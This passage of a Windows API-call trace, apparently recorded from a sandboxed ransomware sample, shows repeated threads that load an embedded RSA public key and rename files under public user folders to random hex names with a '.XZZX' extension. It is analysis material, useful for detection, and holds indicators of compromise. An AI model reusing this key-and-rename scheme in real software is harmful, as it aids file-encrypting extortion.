dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0210.399] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\BC728AC40EB03A9AD8471FDA118B1EE2.XZZX") returned 82 [0210.399] StrStrW (lpFirst="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 841 os_tid = 0xfc0 [0210.550] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.550] lstrcpyW (in: lpString1=0x2daf460, lpString2="4BF5528040685AF08EE9FD2844DA3F38.XZZX" | out: lpString1="4BF5528040685AF08EE9FD2844DA3F38.XZZX") returned="4BF5528040685AF08EE9FD2844DA3F38.XZZX" [0210.550] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.550] SetErrorMode (uMode=0x1) returned 0x1 [0210.550] lstrcpyW (in: lpString1=0x2daf860, lpString2="4BF5528040685AF08EE9FD2844DA3F38.XZZX" | out: lpString1="4BF5528040685AF08EE9FD2844DA3F38.XZZX") returned="4BF5528040685AF08EE9FD2844DA3F38.XZZX" [0210.550] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x37639f1d, Data2=0xfd95, Data3=0x4210, Data4=([0]=0x80, [1]=0x5c, [2]=0x8c, [3]=0x2a, [4]=0x41, [5]=0x50, [6]=0xb1, [7]=0x5d))) returned 0x0 [0210.550] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\4BF5528040685AF08EE9FD2844DA3F38.XZZX") returned 82 [0210.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0210.550] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\B13B44E14170435037639F1D444B2798.XZZX") returned 82 [0210.550] StrStrW (lpFirst="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 842 os_tid = 0xfc4 [0210.700] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.700] lstrcpyW (in: lpString1=0x2daf460, lpString2="847D57104B178490F8F2D4B74FA568D8.XZZX" | out: lpString1="847D57104B178490F8F2D4B74FA568D8.XZZX") returned="847D57104B178490F8F2D4B74FA568D8.XZZX" [0210.700] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.700] SetErrorMode (uMode=0x1) returned 0x1 [0210.700] lstrcpyW (in: lpString1=0x2daf860, lpString2="847D57104B178490F8F2D4B74FA568D8.XZZX" | out: lpString1="847D57104B178490F8F2D4B74FA568D8.XZZX") returned="847D57104B178490F8F2D4B74FA568D8.XZZX" [0210.700] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xa2e1f9ea, Data2=0xf36e, Data3=0x4474, Data4=([0]=0xb9, [1]=0xe3, [2]=0xd5, [3]=0xf8, [4]=0x29, [5]=0xa8, [6]=0xf1, [7]=0x6e))) returned 0x0 [0210.700] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\847D57104B178490F8F2D4B74FA568D8.XZZX") returned 82 [0210.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0210.700] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\7D52808C411785D8A2E1F9EA43F26A20.XZZX") returned 82 [0210.700] StrStrW (lpFirst="847D57104B178490F8F2D4B74FA568D8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 843 os_tid = 0xfc8 [0210.856] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.856] lstrcpyW (in: lpString1=0x2daf460, lpString2="A59ACD7B3AF5E74B902550773F95CB93.XZZX" | out: lpString1="A59ACD7B3AF5E74B902550773F95CB93.XZZX") returned="A59ACD7B3AF5E74B902550773F95CB93.XZZX" [0210.856] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.856] SetErrorMode (uMode=0x1) returned 0x1 [0210.856] lstrcpyW (in: lpString1=0x2daf860, lpString2="A59ACD7B3AF5E74B902550773F95CB93.XZZX" | out: lpString1="A59ACD7B3AF5E74B902550773F95CB93.XZZX") returned="A59ACD7B3AF5E74B902550773F95CB93.XZZX" [0210.856] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xbe2981be, Data2=0x3146, Data3=0x4258, Data4=([0]=0x84, [1]=0xc8, [2]=0x66, [3]=0x3b, [4]=0xb4, [5]=0xb5, [6]=0x22, [7]=0x9c))) returned 0x0 [0210.856] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\A59ACD7B3AF5E74B902550773F95CB93.XZZX") returned 82 [0210.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0210.856] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\F12ED7F40CC4FC10BE2981BE0F9FE058.XZZX") returned 82 [0210.856] StrStrW (lpFirst="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 844 os_tid = 0xfcc [0211.021] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.021] lstrcpyW (in: lpString1=0x2daf460, lpString2="CDC4AAAD0836755B78D170410CA859A3.XZZX" | out: lpString1="CDC4AAAD0836755B78D170410CA859A3.XZZX") returned="CDC4AAAD0836755B78D170410CA859A3.XZZX" [0211.021] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0211.021] SetErrorMode (uMode=0x1) returned 0x1 [0211.021] lstrcpyW (in: lpString1=0x2daf860, lpString2="CDC4AAAD0836755B78D170410CA859A3.XZZX" | out: lpString1="CDC4AAAD0836755B78D170410CA859A3.XZZX") returned="CDC4AAAD0836755B78D170410CA859A3.XZZX" [0211.021] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xc9c18d28, Data2=0xc421, Data3=0x4c1f, Data4=([0]=0x83, [1]=0xab, [2]=0xeb, [3]=0x8e, [4]=0x27, [5]=0x3d, [6]=0x44, [7]=0xa1))) returned 0x0 [0211.021] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\CDC4AAAD0836755B78D170410CA859A3.XZZX") returned 82 [0211.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0211.021] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\3205D2283A518BFFC9C18D283D2C7047.XZZX") returned 82 [0211.021] StrStrW (lpFirst="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 845 os_tid = 0xfd0 [0211.168] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.168] lstrcpyW (in: lpString1=0x2daf460, lpString2="D1FD6140114402301247CBC41572E678.XZZX" | out: lpString1="D1FD6140114402301247CBC41572E678.XZZX") returned="D1FD6140114402301247CBC41572E678.XZZX" [0211.168] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0211.168] SetErrorMode (uMode=0x1) returned 0x1 [0211.168] lstrcpyW (in: lpString1=0x2daf860, lpString2="D1FD6140114402301247CBC41572E678.XZZX" | out: lpString1="D1FD6140114402301247CBC41572E678.XZZX") returned="D1FD6140114402301247CBC41572E678.XZZX" [0211.168] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xb8cbe67d, Data2=0xb56e, Data3=0x4b58, Data4=([0]=0x8f, [1]=0xec, [2]=0xf8, [3]=0x46, [4]=0x12, [5]=0xab, [6]=0x3e, [7]=0x56))) returned 0x0 [0211.168] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\D1FD6140114402301247CBC41572E678.XZZX") returned 82 [0211.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0211.168] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\91936AB6356597D0B8CBE67D38407C18.XZZX") returned 82 [0211.168] StrStrW (lpFirst="D1FD6140114402301247CBC41572E678.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 846 os_tid = 0xfd4 [0211.324] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.324] lstrcpyW (in: lpString1=0x2daf460, lpString2="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX" | out: lpString1="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX") returned="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX" [0211.324] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0211.324] SetErrorMode (uMode=0x1) returned 0x1 [0211.324] lstrcpyW (in: lpString1=0x2daf860, lpString2="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX" | out: lpString1="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX") returned="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX" [0211.324] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xc93eb6ec, Data2=0xe063, Data3=0x4773, Data4=([0]=0x82, [1]=0xb0, [2]=0x1, [3]=0xc6, [4]=0x3f, [5]=0xa5, [6]=0xd8, [7]=0xf3))) returned 0x0 [0211.324] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX") returned 82 [0211.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0211.324] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\B34F3D443EA04179C93EB6EC417B25C1.XZZX") returned 82 [0211.324] StrStrW (lpFirst="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 847 os_tid = 0xfd8 [0211.481] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.481] lstrcpyW (in: lpString1=0x2daf460, lpString2="1EDF30F91E98B984E23EDAF123369DCC.XZZX" | out: lpString1="1EDF30F91E98B984E23EDAF123369DCC.XZZX") returned="1EDF30F91E98B984E23EDAF123369DCC.XZZX" [0211.481] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\" [0211.481] SetErrorMode (uMode=0x1) returned 0x1 [0211.481] lstrcpyW (in: lpString1=0x2daf860, lpString2="1EDF30F91E98B984E23EDAF123369DCC.XZZX" | out: lpString1="1EDF30F91E98B984E23EDAF123369DCC.XZZX") returned="1EDF30F91E98B984E23EDAF123369DCC.XZZX" [0211.481] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x917557d0, Data2=0xcb5c, Data3=0x4b11, Data4=([0]=0x90, [1]=0xa8, [2]=0x29, [3]=0x99, [4]=0x9c, [5]=0x15, [6]=0x23, [7]=0xd5))) returned 0x0 [0211.481] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\1EDF30F91E98B984E23EDAF123369DCC.XZZX") returned 69 [0211.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0211.481] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\52CD7EC03BA1751C917557D03E7C5964.XZZX") returned 69 [0211.481] StrStrW (lpFirst="1EDF30F91E98B984E23EDAF123369DCC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 848 os_tid = 0xfdc [0211.638] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.638] lstrcpyW (in: lpString1=0x2daf460, lpString2="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX" | out: lpString1="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX") returned="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX" [0211.638] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0211.638] SetErrorMode (uMode=0x1) returned 0x1 [0211.638] lstrcpyW (in: lpString1=0x2daf860, lpString2="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX" | out: lpString1="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX") returned="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX" [0211.638] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xe7637bc4, Data2=0x3a0c, Data3=0x4fdb, Data4=([0]=0xad, [1]=0x93, [2]=0x86, [3]=0x3b, [4]=0x30, [5]=0x1f, [6]=0xe2, [7]=0x46))) returned 0x0 [0211.638] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX") returned 82 [0211.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0211.638] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\62B43530121B5C44E7637BC414F6408C.XZZX") returned 82 [0211.638] StrStrW (lpFirst="27FBCCFF13BC6B6F6D9AE66F18224FB7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 849 os_tid = 0xfe0 [0211.792] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW 